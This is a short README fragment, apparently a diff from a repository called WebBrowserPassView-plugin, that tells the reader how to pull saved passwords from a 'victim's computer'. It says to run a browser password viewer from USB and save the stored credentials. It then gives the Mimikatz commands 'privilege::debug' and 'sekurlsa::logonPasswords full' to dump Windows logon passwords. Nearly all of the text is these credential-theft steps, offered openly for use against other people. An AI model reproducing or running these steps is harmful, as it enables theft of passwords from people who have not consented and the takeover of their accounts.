vaginessa/WebBrowserPassView-plugin/README.md

 > or open iepv on victim's computer from USB and tap the button in this programm "Save selected items".

 And you will have passwords and usernames from other sites!

+Mimikatz_trunk this is script for hacking computer passwords:

+> Open mimikatz.exe

+Run commands in mimikatz:

+> mimikatz # privilege::debug

+> mimikatz # sekurlsa::logonPasswords full

+And you will have user passwords!